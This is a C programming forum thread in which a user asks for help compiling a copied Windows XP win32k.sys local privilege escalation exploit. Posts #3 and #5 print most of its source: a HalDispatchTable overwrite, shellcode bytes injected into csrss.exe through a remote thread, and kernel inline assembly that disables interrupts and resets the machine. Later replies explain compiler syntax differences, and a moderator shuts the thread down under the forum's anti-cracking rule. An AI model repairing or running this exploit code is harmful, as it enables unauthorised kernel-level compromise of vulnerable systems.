Thread: What is wrong with these?

  1. #1
    Registered User
    Join Date
    Aug 2012
    Posts
    17

    What is wrong with these?

    Code:
    (
        PUCHAR *String
    );
    With the above I get this error,

    E:\NtUserConsoleControl_Exp\InvbShellCode.h|3|error: expected identifier or '(' before 'PUCHAR'|

    And with this one roughly the same error but different.

    E:\NtUserConsoleControl_Exp\InvbShellCode.h|23|error: expected ')' before 'Filter'|

    Code:
    (
        IN INBV_DISPLAY_STRING_FILTER Filter
    );
    Code:
    (PVOID*)&InbvInstallDisplayStringFilter);
    With this line I get three errors. Could anyone point out my mistake?

    E:\NtUserConsoleControl_Exp\InvbShellCode.h|153|error: 'InbvInstallDisplayStringFilter' undeclared (first use in this function)|

    E:\NtUserConsoleControl_Exp\InvbShellCode.h|153|error: (Each undeclared identifier is reported only once|

    E:\NtUserConsoleControl_Exp\InvbShellCode.h|153|error: for each function it appears in.)|
    Last edited by terminology; 08-11-2012 at 12:27 PM.

  2. #2
    C++ Witch laserlight's Avatar
    Join Date
    Oct 2003
    Location
    Singapore
    Posts
    28,412
    Post the smallest and simplest program -- that uses those code snippets -- which you expect to compile, but which doesn't compile.
    Quote Originally Posted by Bjarne Stroustrup (2000-10-14)
    I get maybe two dozen requests for help with some sort of programming or design problem every day. Most have more sense than to send me hundreds of lines of code. If they do, I ask them to find the smallest example that exhibits the problem and send me that. Mostly, they then find the error themselves. "Finding the smallest program that demonstrates the error" is a powerful debugging tool.
    Look up a C++ Reference and learn How To Ask Questions The Smart Way

  3. #3
    Registered User
    Join Date
    Aug 2012
    Posts
    17
    Code:
    ////////////////////////////////////////////////////////////////////////////////////
    // +----------------------------------------------------------------------------+ //
    // |                                                                            | //
    // | Microsoft Corporation - http://www.microsoft.com/                          | //
    // |                                                                            | //
    // | Affected Software:                                                         | //
    // | Windows XP Service Pack 2                                                  | //
    // | Windows XP Service Pack 3                                                  | //
    // |                                                                            | //
    // | Affected Driver:                                                           | //
    // | Multi-User Win32 Driver - win32k.sys <= 5.1.2600.5796                      | //
    // |                                                                            | //
    // | Local Privilege Escalation Exploit                                         | //
    // | For Educational Purposes Only !                                            | //
    // |                                                                            | //
    // +----------------------------------------------------------------------------+ //
    // |                                                                            | //
    // | NT Internals - http://www.ntinternals.org/                                 | //
    // | alex ntinternals org                                                       | //
    // | 30 July 2009                                                               | //
    // |                                                                            | //
    // | References:                                                                | //
    // | Exploiting Common Flaws in Drivers                                         | //
    // | Ruben Santamarta - http://www.reversemode.com/                             | //
    // |                                                                            | //
    // +----------------------------------------------------------------------------+ //
    ////////////////////////////////////////////////////////////////////////////////////
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <windows.h>
    #include "NtUserConsoleControl_Exp.h"
    #include "InvbShellCode.h"
    #include "XxNativeFunctions.c"
    
    int __cdecl main(int argc, char **argv)
    {
        NTSTATUS NtStatus;
    
        ULONG AllocationSize = PAGE_SIZE * 64;
        ULONG ImageBase;
        PVOID MappedBase;
        UCHAR ImageName[KERNEL_NAME_LENGTH];
        ULONG DllCharacteristics = DONT_RESOLVE_DLL_REFERENCES;
        PVOID HalDispatchTable;
        PVOID xHalQuerySystemInformation;
    
        HANDLE ProcessHandle;
        HANDLE UniqueProcess;
        HANDLE ThreadHandle;
        HANDLE UniqueThread;
    
        ULONG ShellCodeSize = PAGE_SIZE;
        PVOID ShellCodeAddress;
        PVOID BaseAddress = NULL;
        ULONG SyscallNumber = 0x114E;
        USHORT OSBuildNumber;
    
        UNICODE_STRING DllName;
        ANSI_STRING ProcedureName;
        PSYSTEM_MODULE_INFORMATION_EX ModuleInformation = NULL;
        LARGE_INTEGER Interval;
    
        UCHAR ThreadShellCode[] =
                                    "\x55"                 // push ebp
                                    "\x8B\xEC"             // mov ebp, esp
    
                                    "\x2B\xC0"             // sub eax, eax
                                    "\x68\xDE\xC0\xAD\xDE" // push 0xDEADC0DE
                                    "\x6A\x07"             // push 0x07
                                    "\x50"                 // push eax
    
                                    "\xB8\xAD\xDE\x00\x00" // mov eax, 0xDEAD - NtUserConsoleControl
                                    "\xBA\x00\x03\xFE\x7F" // mov edx, 0x7FFE0300
                                    "\xFF\x12"             // call dword ptr [edx]
                                    "\xC9"                 // leave
                                    "\xC3"                 // ret
                                    "\xCC";                // int 0x03
    
        ///////////////////////////////////////////////////////////////////////////////////////////////
    
        system("cls");
    
    
        NtStatus = NtAllocateVirtualMemory(
                                           NtCurrentProcess(), // ProcessHandle
                                           &ModuleInformation, // BaseAddress
                                           0,                  // ZeroBits
                                           &AllocationSize,    // AllocationSize
                                           MEM_COMMIT,         // AllocationType
                                           PAGE_READWRITE);    // Protect
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of NtAllocateVirtualMemory [1] - %.8X\n", NtStatus);
            return NtStatus;
        }
    
        ///////////////////////////////////////////////////////////////////////////////////////////////
    
        NtStatus = NtQuerySystemInformation(
                                            SystemModuleInformation,
                                            (PSYSTEM_MODULE_INFORMATION_EX)ModuleInformation,
                                            AllocationSize,
                                            NULL);
        if(NtStatus)
        {
            printf(" [*] NtStatus of NtQuerySystemInformation - %.8X\n", NtStatus);
            return NtStatus;
        }
    
        ImageBase = (ULONG)(ModuleInformation->Modules[0].Base);
    
    
        RtlMoveMemory(
                      ImageName,
                      (PVOID)(ModuleInformation->Modules[0].ImageName +
                      ModuleInformation->Modules[0].ModuleNameOffset),
                      KERNEL_NAME_LENGTH);
    
        printf(" +----------------------------------------------------------------------------+\n"
               " | ImageBase - %.8X                                                       |\n"
               " | ImageName - %s                                                   |\n",
               ImageBase,
               ImageName);
    
    
        NtStatus = NtFreeVirtualMemory(
                                       NtCurrentProcess(), // ProcessHandle
                                       &ModuleInformation, // BaseAddress
                                       &AllocationSize,    // FreeSize
                                       MEM_DECOMMIT);      // FreeType
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of NtFreeVirtualMemory [1] - %.8X\n", NtStatus);
            return NtStatus;
        }
    
        ///////////////////////////////////////////////////////////////////////////////////////////////
    
        RtlCreateUnicodeStringFromAsciiz(&DllName, (PUCHAR)ImageName);
    
    
        NtStatus = LdrLoadDll(
                              NULL,                // DllPath
                              &DllCharacteristics, // DllCharacteristics
                              &DllName,            // DllName
                              &MappedBase);        // DllHandle
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of LdrLoadDll - %.8X\n", NtStatus);
            return NtStatus;
        }
    
    
        RtlInitAnsiString(&ProcedureName, "HalDispatchTable");
    
    
        NtStatus = LdrGetProcedureAddress(
                                          (PVOID)MappedBase,          // DllHandle
                                          &ProcedureName,             // ProcedureName
                                          0,                          // ProcedureNumber OPTIONAL
                                          (PVOID*)&HalDispatchTable); // ProcedureAddress
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of LdrGetProcedureAddress [1] - %.8X\n", NtStatus);
            return NtStatus;
        }
    
        InbvAcquireDisplayOwnership = (FUNC) ((ULONG)InbvAcquireDisplayOwnership - MappedBase + ImageBase);
    
        xHalQuerySystemInformation = (FUNC) (ULONG)HalDispatchTable + sizeof(ULONG);
    
        printf(" |                                                                            |\n"
               " | HalDispatchTable - %.8X                                                |\n"
               " | xHalQuerySystemInformation - %.8X                                      |\n"
               " +----------------------------------------------------------------------------+\n",
               HalDispatchTable,
               xHalQuerySystemInformation);
    
    
        NtStatus = XxInitInbv(ImageBase, (ULONG)MappedBase);
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of XxInitInbv - %.8X\n", NtStatus);
            return NtStatus;
        }
    
        RtlFreeUnicodeString(&DllName);
        RtlFreeAnsiString(&ProcedureName);
    
        LdrUnloadDll((PVOID)MappedBase);
    
        ///////////////////////////////////////////////////////////////////////////////////////////////
    
        NtStatus = XxGetProcessHandle(
                                      L"csrss.exe",
                                      &ProcessHandle,
                                      &UniqueProcess);
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of XxGetProcessHandle - %.8X\n", NtStatus);
            return NtStatus;
        }
    
        printf(" +----------------------------------------------------------------------------+\n"
               " | Client Server Runtime Process - csrss.exe                                  |\n"
               " | ProcessId - %.4d                                                           |\n"
               " | ProcessHandle - %.4X                                                       |\n",
               UniqueProcess,
               ProcessHandle);
    
        xHalQuerySystemInformation = (FUNC) (ULONG) - 0x0C;
    
        RtlMoveMemory(
                      ThreadShellCode + 6,
                      &xHalQuerySystemInformation,
                      sizeof(ULONG));
    
    
        NtStatus = XxGetOSVersion(
                                  NULL,
                                  NULL,
                                  &OSBuildNumber);
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of XxGetOSVersion - %.8X\n", NtStatus);
            return NtStatus;
        }
    
        if(OSBuildNumber == 2600)
        {
            RtlMoveMemory(
                          ThreadShellCode + 14,
                          &SyscallNumber,
                          sizeof(ULONG));
        }
        else
        {
            printf(" [*] Unsupported OS...\n");
            return TRUE;
        }
    
    
        NtStatus = XxCreateThread(
                                  &ThreadHandle,
                                  &UniqueThread,
                                  ProcessHandle,
                                  UniqueProcess,
                                  ThreadShellCode,
                                  sizeof(ThreadShellCode));
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of XxCreateThread - %.8X\n", NtStatus);
            return NtStatus;
        }
    
        printf(" |                                                                            |\n"
               " | RemoteThreadId - %.4d                                                      |\n"
               " | RemoteThreadHandle - %.4X                                                  |\n"
               " +----------------------------------------------------------------------------+\n",
               UniqueThread,
               ThreadHandle);
    
        ///////////////////////////////////////////////////////////////////////////////////////////////
    
        ShellCodeAddress = (PVOID)sizeof(ULONG);
    
    
        NtStatus = NtAllocateVirtualMemory(
                                           NtCurrentProcess(),
                                           &ShellCodeAddress,
                                           0,
                                           &ShellCodeSize,
                                           MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
                                           PAGE_EXECUTE_READWRITE);
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of NtAllocateVirtualMemory [2] - %.8X\n", NtStatus);
            return NtStatus;
        }
    
        RtlMoveMemory(ShellCodeAddress, (PVOID)InbvShellCode, ShellCodeSize);
    
    
        Interval.LowPart = 0xFF676980;
        Interval.HighPart = 0xFFFFFFFF;
    
        printf("\n 3");
        NtDelayExecution(FALSE, &Interval);
    
        printf(" 2");
        NtDelayExecution(FALSE, &Interval);
    
        printf(" 1");
        NtDelayExecution(FALSE, &Interval);
    
        printf(" Hoop\n\n");
        NtDelayExecution(FALSE, &Interval);
    
    
        NtStatus = NtQueryIntervalProfile(
                                          ProfileTotalIssues, // Source
                                          NULL);              // Interval
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of NtQueryIntervalProfile - %.8X\n", NtStatus);
            return NtStatus;
        }
    
        return FALSE;
    }

  4. #4
    C++ Witch laserlight's Avatar
    Join Date
    Oct 2003
    Location
    Singapore
    Posts
    28,412
    I should have emphasized smallest and simplest. Anyway, I did a quick search of "PUCHAR *String", "IN INBV_DISPLAY_STRING_FILTER Filter" and "(PVOID*)&InbvInstallDisplayStringFilter)" on this page, and I didn't get any matches in post #2, so I'm just going to wait until you post code that actually matches what you described as the problem, and hopefully the code really is small and simple.

  5. #5
    Registered User
    Join Date
    Aug 2012
    Posts
    17
    Sorry about the length of this code.

    Code:
    typedef void (*FUNC) (void);
    (
        PUCHAR *String
    );
    
    VOID (__stdcall *InbvAcquireDisplayOwnership)
    (
        VOID
    );
    
    VOID (__stdcall *InbvDisplayString)
    (
        IN PCHAR String
    );
    
    VOID (__stdcall *InbvEnableDisplayString)
    (
        IN BOOLEAN Enable
    );
    
    VOID (__stdcall *InbvInstallDisplayStringFilter)
    (
        IN INBV_DISPLAY_STRING_FILTER Filter
    );
    
    VOID (__stdcall *InbvResetDisplay)
    (
        VOID
    );
    
    VOID (__stdcall *InbvSetScrollRegion)
    (
        IN ULONG Left,
        IN ULONG Top,
        IN ULONG Width,
        IN ULONG Height
    );
    
    VOID (__stdcall *InbvSetTextColor)
    (
        IN ULONG Color
    );
    
    VOID (__stdcall *InbvSolidColorFill)
    (
        IN ULONG Left,
        IN ULONG Top,
        IN ULONG Width,
        IN ULONG Height,
        IN ULONG Color
    );
    
    NTSTATUS XxInitInbv(IN ULONG ImageBase, IN ULONG MappedBase)
    {
        NTSTATUS NtStatus;
    
        ANSI_STRING ProcedureName;
    
    
        //
        // InbvAcquireDisplayOwnership
        //
    
        RtlInitAnsiString(&ProcedureName, "InbvAcquireDisplayOwnership");
    
        NtStatus = LdrGetProcedureAddress(
                                          (PVOID)MappedBase,                     // DllHandle
                                          &ProcedureName,                        // ProcedureName
                                          0,                                     // ProcedureNumber OPTIONAL
                                          (PVOID*)&InbvAcquireDisplayOwnership); // ProcedureAddress
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of LdrGetProcedureAddress - InbvAcquireDisplayOwnership - 0x%.8X\n", NtStatus);
            return NtStatus;
        }
    
        InbvAcquireDisplayOwnership = (FUNC)((ULONG)InbvAcquireDisplayOwnership - MappedBase + ImageBase);
    
    
        //
        // InbvResetDisplay
        //
    
        RtlInitAnsiString(&ProcedureName, "InbvResetDisplay");
    
        NtStatus = LdrGetProcedureAddress(
                                          (PVOID)MappedBase,
                                          &ProcedureName,
                                          0,
                                          (PVOID*)&InbvResetDisplay);
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of LdrGetProcedureAddress - InbvResetDisplay - 0x%.8X\n", NtStatus);
            return NtStatus;
        }
    
        InbvAcquireDisplayOwnership = (FUNC)((ULONG)InbvAcquireDisplayOwnership - MappedBase + ImageBase);
    
    
        //
        // InbvSolidColorFill
        //
    
        RtlInitAnsiString(&ProcedureName, "InbvSolidColorFill");
    
        NtStatus = LdrGetProcedureAddress(
                                          (PVOID)MappedBase,
                                          &ProcedureName,
                                          0,
                                          (PVOID*)&InbvSolidColorFill);
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of LdrGetProcedureAddress - InbvSolidColorFill - 0x%.8X\n", NtStatus);
            return NtStatus;
        }
    
        InbvAcquireDisplayOwnership = (FUNC)((ULONG)InbvAcquireDisplayOwnership - MappedBase + ImageBase);
    
    
        //
        // InbvSetTextColor
        //
    
        RtlInitAnsiString(&ProcedureName, "InbvSetTextColor");
    
        NtStatus = LdrGetProcedureAddress(
                                          (PVOID)MappedBase,
                                          &ProcedureName,
                                          0,
                                          (PVOID*)&InbvSetTextColor);
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of LdrGetProcedureAddress - InbvSetTextColor - 0x%.8X\n", NtStatus);
            return NtStatus;
        }
    
        InbvAcquireDisplayOwnership = (FUNC)((ULONG)InbvAcquireDisplayOwnership - MappedBase + ImageBase);
    
        //
        // InbvInstallDisplayStringFilter
        //
    
        RtlInitAnsiString(&ProcedureName, "InbvInstallDisplayStringFilter");
    
        NtStatus = LdrGetProcedureAddress(
                                          (PVOID)MappedBase,
                                          &ProcedureName,
                                          0,
                                          (PVOID*)&InbvInstallDisplayStringFilter);
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of LdrGetProcedureAddress - InbvInstallDisplayStringFilter - 0x%.8X\n", NtStatus);
            return NtStatus;
        }
    
        (ULONG)InbvInstallDisplayStringFilter -= MappedBase;
        (ULONG)InbvInstallDisplayStringFilter += ImageBase;
    
    
        //
        // InbvEnableDisplayString
        //
    
        RtlInitAnsiString(&ProcedureName, "InbvEnableDisplayString");
    
        NtStatus = LdrGetProcedureAddress(
                                          (PVOID)MappedBase,
                                          &ProcedureName,
                                          0,
                                          (PVOID*)&InbvEnableDisplayString);
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of LdrGetProcedureAddress - InbvEnableDisplayString - 0x%.8X\n", NtStatus);
            return NtStatus;
        }
    
        InbvAcquireDisplayOwnership = (FUNC)((ULONG)InbvAcquireDisplayOwnership - MappedBase + ImageBase);
    
    
        //
        // InbvSetScrollRegion
        //
    
        RtlInitAnsiString(&ProcedureName, "InbvSetScrollRegion");
    
        NtStatus = LdrGetProcedureAddress(
                                          (PVOID)MappedBase,
                                          &ProcedureName,
                                          0,
                                          (PVOID*)&InbvSetScrollRegion);
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of LdrGetProcedureAddress - InbvSetScrollRegion - 0x%.8X\n", NtStatus);
            return NtStatus;
        }
    
        InbvAcquireDisplayOwnership = (FUNC)((ULONG)InbvAcquireDisplayOwnership - MappedBase + ImageBase);
    
    
        //
        // InbvDisplayString
        //
    
        RtlInitAnsiString(&ProcedureName, "InbvDisplayString");
    
        NtStatus = LdrGetProcedureAddress(
                                          (PVOID)MappedBase,
                                          &ProcedureName,
                                          0,
                                          (PVOID*)&InbvDisplayString);
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of LdrGetProcedureAddress - InbvDisplayString - 0x%.8X\n", NtStatus);
            return NtStatus;
        }
    
        InbvAcquireDisplayOwnership = (FUNC)((ULONG)InbvAcquireDisplayOwnership - MappedBase + ImageBase);
    
    
        printf(" +----------------------------------------------------------------------------+\n"
               " | InbvAcquireDisplayOwnership - 0x%.8X                                   |\n"
               " | InbvResetDisplay - 0x%.8X                                              |\n"
               " | InbvSolidColorFill - 0x%.8X                                            |\n"
               " | InbvSetTextColor - 0x%.8X                                              |\n"
               " | InbvInstallDisplayStringFilter - 0x%.8X                                |\n"
               " | InbvEnableDisplayString - 0x%.8X                                       |\n"
               " | InbvSetScrollRegion - 0x%.8X                                           |\n"
               " | InbvDisplayString - 0x%.8X                                             |\n"
               " +----------------------------------------------------------------------------+\n\n",
               InbvAcquireDisplayOwnership,
               InbvResetDisplay,
               InbvSolidColorFill,
               InbvSetTextColor,
               InbvInstallDisplayStringFilter,
               InbvEnableDisplayString,
               InbvSetScrollRegion,
               InbvDisplayString);
    
        RtlFreeAnsiString(&ProcedureName);
    
        return STATUS_SUCCESS;
    }
    
    VOID InbvShellCode()
    {
        UCHAR BugCheck01[] = " 3";
        UCHAR BugCheck02[] = " 2";
        UCHAR BugCheck03[] = " 1";
        UCHAR BugCheck04[] = " Rebooting ...";
        UCHAR BugCheckString[] =
        "                                                                                "
        " Microsoft Corporation - http://www.microsoft.com/                              "
        "                                                                                "
        " Affected Software:                                                             "
        " Windows XP Service Pack 2                                                      "
        " Windows XP Service Pack 3                                                      "
        "                                                                                "
        " Affected Driver:                                                               "
        " Multi-User Win32 Driver - win32k.sys <= 5.1.2600.5796                          "
        "                                                                                "
        " Local Privilege Escalation Exploit                                             "
        " For Educational Purposes Only !                                                "
        "                                                                                "
        "                                                                                "
        " NT Internals - http://www.ntinternals.org/                                     "
        " alex ntinternals org                                                           "
        " 30 July 2009                                                                   "
        "                                                                                "
        " References:                                                                    "
        " Exploiting Common Flaws in Drivers                                             "
        " Ruben Santamarta - http://www.reversemode.com/                                 "
        "                                                                                "
        "                                                                                ";
    
        __asm
        {
            //
            // KeDisableInterrupts
            //
            pushf
            pop eax
            and eax, 0x0200
            shr eax, 0x09
            cli
    
            //
            // Prepareing Screen
            //
            call InbvAcquireDisplayOwnership
    
            call InbvResetDisplay
    
            sub esi, esi
            push 0x04
            mov edi, 0x01DF
            push edi
            mov ebx, 0x027F
            push ebx
            push esi
            push esi
            call InbvSolidColorFill
    
            push 0x0F
            call InbvSetTextColor
    
            push esi
            call InbvInstallDisplayStringFilter
    
            inc esi
            push esi
            call InbvEnableDisplayString
    
            dec edi
            dec edi
            push edi
            push ebx
            dec esi
            push esi
            push esi
            call InbvSetScrollRegion
    
            lea eax, BugCheckString
            push eax
            call InbvDisplayString
    
            mov esi, 0x80000000
            mov ecx, esi
    
            //
            // Countdown
            //
        __loop01:
            dec ecx
            jnz __loop01
    
            lea eax, BugCheck01
            push eax
            call InbvDisplayString
    
            mov ecx, esi
    
        __loop02:
            dec ecx
            jnz __loop02
    
            lea eax, BugCheck02
            push eax
            call InbvDisplayString
    
            mov ecx, esi
    
        __loop03:
            dec ecx
            jnz __loop03
    
            lea eax, BugCheck03
            push eax
            call InbvDisplayString
    
            mov ecx, esi
    
        __loop04:
            dec ecx
            jnz __loop04
    
            lea eax, BugCheck04
            push eax
            call InbvDisplayString
    
            mov ecx, esi
            shl ecx, 0x01
    
        __loop05:
            dec ecx
            jnz __loop05
    
            //
            // Reseting Processor
            //
            mov al, 0xFE
            out 0x64, al
        }
    }

  6. #6
    C++ Witch laserlight's Avatar
    Join Date
    Oct 2003
    Location
    Singapore
    Posts
    28,412
    Ah, now we're talking.

    What did you intend by writing the code below?
    Code:
    typedef void (*FUNC) (void);
    (
        PUCHAR *String
    );
    It can be re-written as:
    Code:
    typedef void (*FUNC) (void);
    
    (PUCHAR *String);
    Upon which it becomes apparent that you are trying to declare a PUCHAR* named String, except that for some reason you placed the declaration in parentheses instead of writing:
    Code:
    PUCHAR *String;
    For the error concerning InbvInstallDisplayStringFilter, it is as the error message says: InbvInstallDisplayStringFilter was not declared.

  7. #7
    Registered User
    Join Date
    Aug 2012
    Posts
    17
    Ok thanks very much for the help.

  8. #8
    Registered User
    Join Date
    Aug 2012
    Posts
    17
    Could you help point out the errors with what I've got here? I understand the undeclared bits, but how do I declare these properly?

    E:\NtUserConsoleControl_Exp\InvbShellCode.h||In function 'InbvShellCode':|
    E:\NtUserConsoleControl_Exp\InvbShellCode.h|283|error: expected '(' before '{' token|
    E:\NtUserConsoleControl_Exp\InvbShellCode.h|287|error: 'pushf' undeclared (first use in this function)|
    E:\NtUserConsoleControl_Exp\InvbShellCode.h|287|error: (Each undeclared identifier is reported only once|
    E:\NtUserConsoleControl_Exp\InvbShellCode.h|287|error: for each function it appears in.)|
    E:\NtUserConsoleControl_Exp\InvbShellCode.h|288|error: 'pop' undeclared (first use in this function)|
    E:\NtUserConsoleControl_Exp\InvbShellCode.h|288|error: 'eax' undeclared (first use in this function)|
    E:\NtUserConsoleControl_Exp\InvbShellCode.h|289|error: 'and' undeclared (first use in this function)|
    E:\NtUserConsoleControl_Exp\InvbShellCode.h|290|error: 'shr' undeclared (first use in this function)|
    E:\NtUserConsoleControl_Exp\InvbShellCode.h|291|error: 'cli' undeclared (first use in this function)|
    E:\NtUserConsoleControl_Exp\InvbShellCode.h|296|error: expected ';' before 'call'|
    E:\NtUserConsoleControl_Exp\NtUserConsoleControl_Exp.c||In function 'main':|
    E:\NtUserConsoleControl_Exp\NtUserConsoleControl_Exp.c|173|error: invalid operands to binary - (have 'long unsigned int' and 'PVOID')|
    ||=== Build finished: 11 errors, 0 warnings ===|

  9. #9
    Registered User
    Join Date
    Apr 2008
    Posts
    396
    These are assembly statements enclosed in the __asm directive; the compiler should normally skip them.
    You get syntax errors meaning your compiler simply doesn't understand that directive (which is a compiler extension by the way, not pure C).
    I suggest you check your compiler documentation, or provide the additional details on your development tools here.

  10. #10
    Registered User
    Join Date
    Aug 2012
    Posts
    17
    I'm using codeblocks with the GNU GCC Compiler, as I've never really used any other IDE for compiling with C. I have also tried to use Visual Express 2010, which throws out the same errors, and Tiny C Compiler, which throws one error out and then just quits.

  11. #11
    Registered User
    Join Date
    Aug 2005
    Location
    Austria
    Posts
    1,990
    gcc uses AT&T assembler syntax. It's quite different to the Intel assembler syntax that msvc uses.

    Kurt
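The point made in posts #9 and #11, as an added example that is not part of the thread or of the code under discussion: the same `and`/`shr` pair written once as an MSVC `__asm` block (Intel syntax, 32-bit x86 only) and once as GCC extended asm (AT&T syntax). The function name `extract_bit9`, the mask 0x200 and the shift count 9 are assumptions chosen for illustration.

```c
#include <stdio.h>

/* Hypothetical helper: returns bit 9 of `flags` as 0 or 1. */
unsigned extract_bit9(unsigned flags)
{
#if defined(_MSC_VER) && defined(_M_IX86)
    /* MSVC inline assembler: Intel syntax, destination operand first,
       bare register names, C variables referenced by name.
       Only available when targeting 32-bit x86. */
    unsigned result;
    __asm {
        mov eax, flags
        and eax, 0x200
        shr eax, 9
        mov result, eax
    }
    return result;
#elif defined(__GNUC__) && (defined(__i386__) || defined(__x86_64__))
    /* GCC extended asm: AT&T syntax by default, source operand first,
       '$' prefixes immediates, '%0' is the first listed operand.
       "+r" = read/write register operand; "cc" = flags are clobbered.
       (GCC also accepts Intel syntax when built with -masm=intel.) */
    unsigned result = flags;
    __asm__ ("andl $0x200, %0\n\t"
             "shrl $9, %0"
             : "+r" (result)
             :
             : "cc");
    return result;
#else
    /* Any other compiler or CPU: plain C, no extension needed. */
    return (flags & 0x200u) >> 9;
#endif
}

int main(void)
{
    /* Constructed sample values. */
    printf("%u %u\n", extract_bit9(0x202u), extract_bit9(0x002u));
    return 0;
}
```

Feeding the MSVC branch to GCC produces the kind of "undeclared" and "expected '('" diagnostics quoted in post #8, because GCC parses the block's contents as C.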

  12. #12
    and the hat of int overfl Salem's Avatar
    Join Date
    Aug 2001
    Location
    The edge of the known universe
    Posts
    39,656
    OK, I'm drawing a line under this.
    Announcements - C Programming
    Quote Originally Posted by the rules
    6. Messages relating to cracking, (erroneously called "hacking" by many), copyright violations, or other illegal activities will be deleted. Due to the overlapping boundaries of code with malicious intent, and other legitimate uses of it, the moderators will assess each potential infraction on a case by case basis.
    Quote Originally Posted by terminology
    Look, I'm not trying to get you guys to do all the work, I'm not a script kiddie. I am learning code at the minute but I am also learning IT Security as I do wish to become a CEH (Certified Ethical Hacker). I will not be using this with malicious intent; I have already set up a virtual box for testing and even if I did use it it would be that gets into s**t for it so.
    Now this is the 2nd thread where you've posted basically the same "found" code and the "it doesn't work" refrain. This makes it seem to me exactly like you're the kind of script kiddie you profess in your other thread not to be.

    smokeyangel's post #18 is bang on - you need to learn all the basic stuff first.
    In particular, you NEED to learn that every compiler treats inline assembler differently.

    If you're serious about CEH, you should be able to analyse the code "on paper" and create your own version yourself based on the theoretical description. This would be a more valuable learning exercise than what you're trying to do at the moment.

    If you want help learning C or C++, then I'm sure we can help you.

    But block copy/pasting exploit code has to stop.
    If you dance barefoot on the broken glass of undefined behaviour, you've got to expect the occasional cut.
    If at first you don't succeed, try writing your phone number on the exam paper.

  13. #13
    Registered User
    Join Date
    Dec 2011
    Posts
    795
    This should be in the Windows-only forum, as it obviously pertains to Windows-specific APIs and architecture.

    Also, don't act like you're interested in computer security when you've just copied code you found here and tried to compile it. People who are actual computer security professionals have taken classes/read books/studied exactly how attacks work and ways to prevent them.
